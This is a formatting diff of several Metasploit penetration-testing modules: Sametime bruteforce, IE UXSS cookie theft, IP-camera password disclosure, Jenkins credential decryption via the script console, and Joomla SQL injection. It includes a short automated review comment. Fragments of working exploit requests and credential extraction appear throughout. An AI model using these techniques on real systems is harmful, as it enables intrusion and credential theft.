if test_current.length < datastore['MAXDEPTH']
@charset.each do | char |
@charset.each do |char|
@test_queue.push(test_current + char)
end
elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and datastore['MAXDEPTH'] > 1
@@ -267,12 +268,12 @@ class MetasploitModule < Msf::Auxiliary
def report_user(username)
report_note(
:host => rhost,
:port => rport,
:proto => 'tcp',
:sname => 'sametime',
:type => 'ibm_lotus_sametime_user',
:data => { :username => username },
:host => rhost,
:port => rport,
:proto => 'tcp',
:sname => 'sametime',
:type => 'ibm_lotus_sametime_user',
:data => { :username => username },
:update => :unique_data
)
end
@@ -282,18 +283,19 @@ class MetasploitModule < Msf::Auxiliary
user_tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "IBM Lotus Sametime Users",
'Prefix' => "\n",
'Indent' => 1,
'Columns' =>
'Header' => "IBM Lotus Sametime Users",
'Prefix' => "\n",
'Indent' => 1,
'Columns' =>
[
"UID",
"Email",
"CommonName"
])
]
)
# populate tables
@user_data.each do | line |
@user_data.each do |line|
user_tbl << [ line[0], line[1], line[2] ]
end
@@ -10,42 +10,44 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Notes Sametime Room Name Bruteforce',
'Description' => %q{
This module bruteforces Sametime meeting room names via the IBM
Lotus Notes Sametime web interface.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'IBM Lotus Notes Sametime Room Name Bruteforce',
'Description' => %q{
This module bruteforces Sametime meeting room names via the IBM
Lotus Notes Sametime web interface.
},
'Author' => [
'kicks4kittens' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2013-3977' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'SSL' => true
},
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('OWNER', [ true, 'The owner to bruteforce meeting room names for', '']),
OptPath.new('DICT', [ true, 'The path to the userinfo script' ]),
OptString.new('OWNER', [ true, 'The owner to bruteforce meeting room names for', '']),
OptPath.new('DICT', [ true, 'The path to the userinfo script' ]),
OptString.new('TARGETURI', [ true, 'Path to stmeetings', '/stmeetings/'])
])
]
)
register_advanced_options(
[
OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
OptInt.new('Threads', [ true, 'Number of test threads', 10])
])
OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
OptInt.new('Threads', [ true, 'Number of test threads', 10])
]
)
end
def run
@@ -58,13 +60,13 @@ class MetasploitModule < Msf::Auxiliary
@reqpath = normalize_uri(uri, '/restapi')
res = send_request_cgi({
'uri' => @reqpath,
'method' => 'GET',
'ctype' => 'text/html',
'uri' => @reqpath,
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' => {
'owner' => datastore['OWNER'],
'permaName' => rval
}
}
})
unless res
@@ -89,7 +91,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Beginning dictionary bruteforce using (#{datastore['Threads']} Threads)")
while(not @test_queue.empty?)
while (not @test_queue.empty?)
t = []
nt = datastore['Threads'].to_i
nt = 1 if nt <= 0
@@ -114,11 +116,10 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
t.each {|x| x.join }
t.each { |x| x.join }
rescue ::Timeout::Error
ensure
t.each {|x| x.kill rescue nil }
t.each { |x| x.kill rescue nil }
end
end
end
@@ -131,9 +132,9 @@ class MetasploitModule < Msf::Auxiliary
end
res = send_request_cgi({
'uri' => @reqpath,
'method' => 'GET',
'ctype' => 'text/html',
'uri' => @reqpath,
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' =>
{
'owner' => datastore['OWNER'],
@@ -157,36 +158,34 @@ class MetasploitModule < Msf::Auxiliary
end
def output_table(room_info, test_current)
print_good("New meeting room found: #{test_current}")
# print output table for discovered meeting rooms
roomtbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "[IBM Lotus Sametime] Meeting Room #{test_current}",
'Prefix' => "",
'Postfix' => "\n",
'Indent' => 1,
'Columns' =>
[
"Key",
"Value"
]
)
'Header' => "[IBM Lotus Sametime] Meeting Room #{test_current}",
'Prefix' => "",
'Postfix' => "\n",
'Indent' => 1,
'Columns' =>
[
"Key",
"Value"
]
)
room_info['results'][0].each do |k, v|
if v.is_a?(Hash)
# breakdown Hash
roomtbl << [ k.to_s, '>>' ] # title line
v.each do | subk, subv |
roomtbl << [ "#{k.to_s}:#{subk.to_s}", subv.to_s || "-"] if not v.nil? or v.empty?
v.each do |subk, subv|
roomtbl << [ "#{k.to_s}:#{subk.to_s}", subv.to_s || "-"] if not v.nil? or v.empty?
end
else
roomtbl << [ k.to_s, v.to_s || "-"] unless v.nil?
roomtbl << [ k.to_s, v.to_s || "-"] unless v.nil?
end
end
# output table
print_good(roomtbl.to_s)
end
end
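Review bot: In `output_table`, `subv.to_s || "-"` and `v.to_s || "-"` can never produce the `"-"` placeholder because `to_s` always returns a String, and the guard `if not v.nil? or v.empty?` on the nested-hash branch is always true since `v` is the Hash being iterated; the reformat preserved this dead fallback untouched. The intent reads as `subv.nil? ? "-" : subv.to_s` (and likewise for `v`), with the trailing guard dropped. Separately, `while (not @test_queue.empty?)` in `run` survived autocorrect with its parens and `not`; the idiomatic form under the style guide this commit adopts is `until @test_queue.empty?`.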
@@ -10,16 +10,16 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
URLS = [
'/stmeetings/about.jsp',
'/stmeetings/serverversion.properties',
'/rtc/buildinfo.txt',
'/stmeetings/configuration?format=json&verbose=true'
'/stmeetings/about.jsp',
'/stmeetings/serverversion.properties',
'/rtc/buildinfo.txt',
'/stmeetings/configuration?format=json&verbose=true'
]
PROXY_URLS = [
'/stwebclient/i18nStrings.jsp',
'/stwebclient/communityserver',
'/stwebav/WebAVServlet?Name=WebPlayerVersion'
'/stwebclient/i18nStrings.jsp',
'/stwebclient/communityserver',
'/stwebav/WebAVServlet?Name=WebPlayerVersion'
]
JSON_KEYS = [
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
INFO_REGEXS = [
# section, key, regex
[ 'version', 'sametimeVersion', /lotusBuild">Release (.+?)<\/td>/i ],
[ 'api', 'meeting', /^meeting=(.*)$/i ],
[ 'api', 'meeting', /^meeting=(.*)$/i ],
[ 'api', 'appshare', /^appshare=(.*)$/i ],
[ 'api', 'docshare', /^docshare=(.*)$/i ],
[ 'api', 'rtc4web', /^rtc4web=(.*)$/i ],
@@ -56,50 +56,49 @@ class MetasploitModule < Msf::Auxiliary
[ 'api', 'video', /^video=(.*)$/i]
]
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Sametime Version Enumeration',
'Description' => %q{
This module scans an IBM Lotus Sametime web interface to enumerate
the application's version and configuration information.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'IBM Lotus Sametime Version Enumeration',
'Description' => %q{
This module scans an IBM Lotus Sametime web interface to enumerate
the application's version and configuration information.
},
'Author' => [
'kicks4kittens' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2013-3982' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'SSL' => true
},
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [ true, "The path to the Sametime Server", '/']),
OptBool.new('QuerySametimeProxy', [ true, "Automatically query Sametime proxy if found", true]),
OptBool.new('ShowVersions', [ true, "Display Version information from server", true]),
OptBool.new('ShowConfig', [ true, "Display Config information from server", true]),
OptBool.new('ShowAPIVersions', [ true, "Display API Version information from server", false])
])
OptString.new('TARGETURI', [ true, "The path to the Sametime Server", '/']),
OptBool.new('QuerySametimeProxy', [ true, "Automatically query Sametime proxy if found", true]),
OptBool.new('ShowVersions', [ true, "Display Version information from server", true]),
OptBool.new('ShowConfig', [ true, "Display Config information from server", true]),
OptBool.new('ShowAPIVersions', [ true, "Display API Version information from server", false])
]
)
register_advanced_options(
[
OptBool.new('StoreConfigs', [ true, "Store JSON configs to loot", true])
])
OptBool.new('StoreConfigs', [ true, "Store JSON configs to loot", true])
]
)
end
def check_url(url, proxy='')
def check_url(url, proxy = '')
cgi_options = {
'uri' => normalize_uri(target_path, url),
'method' => 'GET'
@@ -199,47 +198,50 @@ class MetasploitModule < Msf::Auxiliary
# configure tables
version_tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "IBM Lotus Sametime Information [Version]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
'Header' => "IBM Lotus Sametime Information [Version]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
[
"Component",
"Version"
])
]
)
conf_tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "IBM Lotus Sametime Information [Config]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
'Header' => "IBM Lotus Sametime Information [Config]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
[
"Key",
"Value"
])
]
)
api_tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "IBM Lotus Sametime Information [API]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
'Header' => "IBM Lotus Sametime Information [API]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
[
"API",
"Version"
])
]
)
# populate tables
@version_info['version'].each do | line |
@version_info['version'].each do |line|
version_tbl << [ line[0], line[1] ]
end
@version_info['conf'].each do | line |
@version_info['conf'].each do |line|
conf_tbl << [ line[0], line[1] ]
end
@version_info['api'].each do | line |
@version_info['api'].each do |line|
api_tbl << [ line[0], line[1] ]
end
@@ -250,11 +252,11 @@ class MetasploitModule < Msf::Auxiliary
# report_note
report_note(
:host => rhost,
:port => rport,
:host => rhost,
:port => rport,
:proto => 'http',
:ntype => 'ibm_lotus_sametime_version',
:data => { :version => @version_info['version']['sametimeVersion'] }
:data => { :version => @version_info['version']['sametimeVersion'] }
) if @version_info['version']['sametimeVersion']
end
@@ -297,7 +299,7 @@ class MetasploitModule < Msf::Auxiliary
@version_info['api'] = {}
print_status("Checking IBM Lotus Sametime Server")
URLS.each do | url |
URLS.each do |url|
check_url(url)
end
@@ -312,7 +314,7 @@ class MetasploitModule < Msf::Auxiliary
print_good("Sametime Proxy address discovered #{proxy}")
PROXY_URLS.each do | url |
PROXY_URLS.each do |url|
check_url(url, proxy)
end
elsif proxy?
@@ -6,37 +6,40 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => 'Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability',
'Description' => %q{
It was found that Internet Explorer allows the disclosure of local file names.
This issue exists due to the fact that Internet Explorer behaves different for
file:// URLs pointing to existing and non-existent files. When used in
combination with HTML5 sandbox iframes it is possible to use this behavior to
find out if a local file exists. This technique only works on Internet Explorer
10 & 11 since these support the HTML5 sandbox. Also it is not possible to do
this from a regular website as file:// URLs are blocked all together. The attack
must be performed locally (works with Internet zone Mark of the Web) or from a
share.
},
'License' => MSF_LICENSE,
'Author' => 'Yorick Koster',
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability',
'Description' => %q{
It was found that Internet Explorer allows the disclosure of local file names.
This issue exists due to the fact that Internet Explorer behaves different for
file:// URLs pointing to existing and non-existent files. When used in
combination with HTML5 sandbox iframes it is possible to use this behavior to
find out if a local file exists. This technique only works on Internet Explorer
10 & 11 since these support the HTML5 sandbox. Also it is not possible to do
this from a regular website as file:// URLs are blocked all together. The attack
must be performed locally (works with Internet zone Mark of the Web) or from a
share.
},
'License' => MSF_LICENSE,
'Author' => 'Yorick Koster',
'References' => [
['CVE', '2016-3321'],
['MSB', 'MS16-095'],
['URL', 'https://securify.nl/advisory/SFY20160301/internet_explorer_iframe_sandbox_local_file_name_disclosure_vulnerability.html'],
],
'Platform' => 'win',
'DisclosureDate' => '2016-08-09'
))
'Platform' => 'win',
'DisclosureDate' => '2016-08-09'
)
)
register_options(
[
OptString.new('SHARENAME', [ true, "The name of the top-level share.", "falcon" ]),
OptString.new('PATHS', [ true, "The list of files to check (comma separated).", "Testing/Not/Found/Check.txt, Windows/System32/calc.exe, Program Files (x86)/Mozilla Firefox/firefox.exe, Program Files/VMware/VMware Tools/TPAutoConnSvc.exe" ]),
])
]
)
# no SSL
deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT', 'URIPATH')
@@ -110,7 +113,7 @@ class MetasploitModule < Msf::Auxiliary
end
def on_request_uri(cli, request)
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
case request.method
when 'OPTIONS'
@@ -176,15 +179,15 @@ class MetasploitModule < Msf::Auxiliary
print_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
headers.each_pair { |k, v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
@@ -213,7 +216,7 @@ class MetasploitModule < Msf::Auxiliary
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>
<lp1:getcontentlength>#{rand(0x100000) + 128000}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
@@ -306,7 +309,7 @@ class MetasploitModule < Msf::Auxiliary
def generate_shares(path)
share_name = datastore['SHARENAME']
%Q|
%Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
<D:propstat>
@@ -345,7 +348,7 @@ class MetasploitModule < Msf::Auxiliary
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
<lp1:getcontentlength>#{rand(0x10000) + 120}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
@@ -368,11 +371,11 @@ class MetasploitModule < Msf::Auxiliary
|
end
def gen_timestamp(ttype=nil)
def gen_timestamp(ttype = nil)
::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
end
def gen_datestamp(ttype=nil)
def gen_datestamp(ttype = nil)
::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
end
@@ -6,41 +6,43 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
'Description' => %q{
def initialize(info = {})
super(
update_info(
info,
'Name' => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
'Description' => %q{
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
have X-Frame-Options or it will fail). You can also have your own custom JavaScript
by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
you are behind NAT.
},
'License' => MSF_LICENSE,
'Author' =>
[
'David Leo', # Original discovery
},
'License' => MSF_LICENSE,
'Author' => [
'David Leo', # Original discovery
'filedescriptor', # PoC
'joev', # He figured it out really
'sinn3r' # MSF
],
'References' =>
[
'References' => [
[ 'CVE', '2015-0072' ],
[ 'OSVDB', '117876' ],
[ 'MSB', 'MS15-018' ],
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2015/Feb/10' ]
],
'Platform' => 'win',
'DisclosureDate' => '2015-02-01'
))
'Platform' => 'win',
'DisclosureDate' => '2015-02-01'
)
)
register_options(
[
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
])
[
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
]
)
end
def setup
@@ -63,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
@ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
end
def get_uri(cli=self.cli)
def get_uri(cli = self.cli)
ssl = datastore["SSL"]
proto = (ssl ? "https://" : "http://")
if datastore['URIHOST']
@@ -14,10 +14,9 @@ class MetasploitModule < Msf::Auxiliary
info,
'Name' => 'HTTP SSL Certificate Impersonation',
'Author' => 'Chris John Riley',
'References' =>
[
['URL', 'https://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles']
],
'References' => [
['URL', 'https://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles']
],
'License' => MSF_LICENSE,
'Description' => %q{
This module request a copy of the remote SSL certificate and creates a local
@@ -51,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
end
def get_cert(rhost, rport, sni)
info_hash = {'PeerHost' => sni, 'PeerAddr' => rhost, 'PeerPort' => rport.to_s}
info_hash = { 'PeerHost' => sni, 'PeerAddr' => rhost, 'PeerPort' => rport.to_s }
sslSocket = Rex::Socket::SslTcp.create(info_hash)
cert = sslSocket.peer_cert
sslSocket.close
@@ -218,6 +217,5 @@ class MetasploitModule < Msf::Auxiliary
p = store_loot("#{datastore['RHOST'].downcase}_pem", 'pem', addr, combined, 'imp_ssl.pem', 'Impersonate_SSL')
print_good("pem: #{p}")
end
end
@@ -10,26 +10,24 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure',
'Description' => %q{
'Name' => 'JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure',
'Description' => %q{
SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU),
and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR)
allow an unauthenticated user to disclose the username & password by
requesting the javascript page 'readfile.cgi?query=ADMINID'.
Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235
},
'References' =>
[
['EDB', '40254'],
['EDB', '40263'],
['EDB', '40264']
],
'Author' =>
[
'Yakir Wizman', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'References' => [
['EDB', '40254'],
['EDB', '40263'],
['EDB', '40264']
],
'Author' => [
'Yakir Wizman', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Aug 16 2016'
)
@@ -43,8 +41,8 @@ class MetasploitModule < Msf::Auxiliary
url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'readfile.cgi')
vprint_status("Attempting to load data from #{url}?query=ADMINID")
res = send_request_cgi({
'uri' => url,
'vars_get' => {'query'=>'ADMINID'}
'uri' => url,
'vars_get' => { 'query' => 'ADMINID' }
})
unless res
print_error("#{peer} Unable to connect to #{url}")
@@ -59,8 +57,8 @@ class MetasploitModule < Msf::Auxiliary
if res.body =~ /var Adm_ID="(.+?)";\s+var Adm_Pass1="(.+?)";/
print_good("Found: #{$1}:#{$2}")
store_valid_credential(
user: $1,
private: $2,
user: $1,
private: $2,
private_type: :password
)
end
@@ -11,24 +11,24 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'Java RMI Registry Interfaces Enumeration',
'Description' => %q{
'Name' => 'Java RMI Registry Interfaces Enumeration',
'Description' => %q{
This module gathers information from an RMI endpoint running an RMI registry
interface. It enumerates the names bound in a registry and looks up each
remote reference.
},
'Author' => ['juan vazquez'],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://docs.oracle.com/javase/8/docs/platform/rmi/spec/rmiTOC.html']
]
'Author' => ['juan vazquez'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://docs.oracle.com/javase/8/docs/platform/rmi/spec/rmiTOC.html']
]
)
register_options(
[
Opt::RPORT(1099)
])
]
)
end
def run
@@ -65,7 +65,6 @@ class MetasploitModule < Msf::Auxiliary
print_good("#{names.length} names found in the Registry")
names.each do |name|
begin
remote_reference = send_registry_lookup(name: name)
rescue ::Rex::Proto::Rmi::Exception => e
@@ -9,40 +9,40 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins Domain Credential Recovery',
'Description' => %q{
This module will collect Jenkins domain credentials, and uses
the script console to decrypt each password if anonymous permission
is allowed.
super(
update_info(
info,
'Name' => 'Jenkins Domain Credential Recovery',
'Description' => %q{
This module will collect Jenkins domain credentials, and uses
the script console to decrypt each password if anonymous permission
is allowed.
It has been tested against Jenkins version 1.590, 1.633, and 1.638.
},
'Author' =>
[
It has been tested against Jenkins version 1.590, 1.633, and 1.638.
},
'Author' => [
'Th3R3p0', # Vuln Discovery, PoC
'sinn3r' # Metasploit
'sinn3r' # Metasploit
],
'References' =>
[
'References' => [
[ 'EDB', '38664' ],
[ 'URL', 'https://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html' ]
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'RPORT' => 8080
},
'License' => MSF_LICENSE
))
'License' => MSF_LICENSE
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),
OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),
OptString.new('JENKINSDOMAIN', [true, 'The domain where we want to extract credentials from', '_'])
])
]
)
end
# Returns the Jenkins version.
#
# @return [String] Jenkins version.
@@ -61,7 +61,6 @@ class MetasploitModule < Msf::Auxiliary
version.scan(/jenkins\-([\d\.]+)/).flatten.first
end
# Returns the Jenkins domain configured by the user.
#
# @return [String]
@@ -69,7 +68,6 @@ class MetasploitModule < Msf::Auxiliary
datastore['JENKINSDOMAIN']
end
# Returns a check code indicating the vulnerable status.
#
# @return [Array] Check code
@@ -86,7 +84,6 @@ class MetasploitModule < Msf::Auxiliary
Exploit::CheckCode::Safe
end
# Returns all the found Jenkins accounts of a specific domain. The accounts collected only
# include the ones with the username-and-password kind. It does not include other kinds such
# as SSH, certificates, or other plugins.
@@ -99,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain)
uri << '/'
res = send_request_cgi({ 'uri'=>uri })
res = send_request_cgi({ 'uri' => uri })
unless res
fail_with(Failure::Unknown, 'Connection timed out while enumerating accounts.')
@@ -120,18 +117,17 @@ class MetasploitModule < Msf::Auxiliary
next unless /Username with password/i === kind
users << {
id: id,
username: name,
kind: kind,
id: id,
username: name,
kind: kind,
description: desc,
domain: domain
domain: domain
}
end
users
end
# Returns the found encrypted password from the update page.
#
# @param id [String] The ID of a specific account.
@@ -140,7 +136,7 @@ class MetasploitModule < Msf::Auxiliary
# @return [NilCass] No encrypted password found.
def get_encrypted_password(id)
uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain, 'credential', id, 'update')
res = send_request_cgi({ 'uri'=>uri })
res = send_request_cgi({ 'uri' => uri })
unless res
fail_with(Failure::Unknown, 'Connection timed out while getting the encrypted password')
@@ -158,7 +154,6 @@ class MetasploitModule < Msf::Auxiliary
nil
end
# Returns the decrypted password by using the script console.
#
# @param encrypted_pass [String] The encrypted password.
@@ -166,13 +161,13 @@ class MetasploitModule < Msf::Auxiliary
# @return [String] The decrypted password.
# @return [NilClass] No decrypted password found (no result found on the console)
def decrypt(encrypted_pass)
uri = normalize_uri(target_uri, 'script')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
uri = normalize_uri(target_uri, 'script')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'",
'json' => {'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'"}.to_json,
'json' => { 'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'" }.to_json,
'Submit' => 'Run'
}
})
@@ -198,7 +193,6 @@ class MetasploitModule < Msf::Auxiliary
nil
end
# Decrypts an encrypted password for a given ID.
#
# @param id [String] Account ID.
@@ -210,7 +204,6 @@ class MetasploitModule < Msf::Auxiliary
decrypt(encrypted_pass)
end
# Reports the username and password to database.
#
# @param opts [Hash]
@@ -250,7 +243,6 @@ class MetasploitModule < Msf::Auxiliary
create_credential_login(login_data)
end
def run
users = get_users
print_status("Found users for domain #{domain}: #{users.length}")
@@ -275,18 +267,15 @@ class MetasploitModule < Msf::Auxiliary
end
end
def print_status(msg='')
def print_status(msg = '')
super("#{peer} - #{msg}")
end
def print_good(msg='')
def print_good(msg = '')
super("#{peer} - #{msg}")
end
def print_error(msg='')
def print_error(msg = '')
super("#{peer} - #{msg}")
end
end
@@ -8,37 +8,39 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla Real Estate Manager Component Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla Plugin
com_realestatemanager versions 3.7 in order to either enumerate
usernames and password hashes.
},
'References' =>
[
super(
update_info(
info,
'Name' => 'Joomla Real Estate Manager Component Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla Plugin
com_realestatemanager versions 3.7 in order to either enumerate
usernames and password hashes.
},
'References' => [
['EDB', '38445']
],
'Author' =>
[
'Author' => [
'Omer Ramic', # discovery
'Nixawk', # metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2015-10-22'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2015-10-22'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
])
]
)
end
def print_good(message='')
def print_good(message = '')
super("#{rhost}:#{rport} - #{message}")
end
def print_status(message='')
def print_status(message = '')
super("#{rhost}:#{rport} - #{message}")
end
@@ -106,10 +108,9 @@ class MetasploitModule < Msf::Auxiliary
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => get,
'vars_get' => get,
})
if res && res.code == 200
cookie = res.get_cookies
post = {
@@ -120,7 +121,7 @@ class MetasploitModule < Msf::Auxiliary
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'cookie' => cookie,
'vars_get' => get,
'vars_get' => get,
'vars_post' => post
})
@@ -184,7 +185,7 @@ class MetasploitModule < Msf::Auxiliary
colc = sqli(query)
vprint_status("Found Columns: #{colc} from #{database}.#{table}")
valid_cols = [ # joomla_users
valid_cols = [ # joomla_users
'activation',
'block',
'email',
@@ -214,6 +215,7 @@ class MetasploitModule < Msf::Auxiliary
loop do
value = sqli(query_fmt % [col, l, i])
break if value.blank?
record[col] << value
l += 54
end
@@ -244,12 +246,14 @@ class MetasploitModule < Msf::Auxiliary
tables.each do |table|
cols = query_columns(db, table)
next if cols.blank?
path = store_loot(
'joomla.users',
'text/plain',
datastore['RHOST'],
cols.to_json,
'joomla.users')
'joomla.users'
)
print_good('Saved file to: ' + path)
end
end
@@ -8,31 +8,33 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla com_contenthistory Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla versions 3.2
through 3.4.4 in order to either enumerate usernames and password hashes.
},
'References' =>
[
super(
update_info(
info,
'Name' => 'Joomla com_contenthistory Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla versions 3.2
through 3.4.4 in order to either enumerate usernames and password hashes.
},
'References' => [
['CVE', '2015-7297'],
['URL', 'https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/joomla-sql-injection-vulnerability-exploit-results-in-full-administrative-access/']
],
'Author' =>
[
'Author' => [
'Asaf Orpani', # discovery
'bperry', # metasploit module
'Nixawk' # module review
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2015-10-22'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2015-10-22'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
])
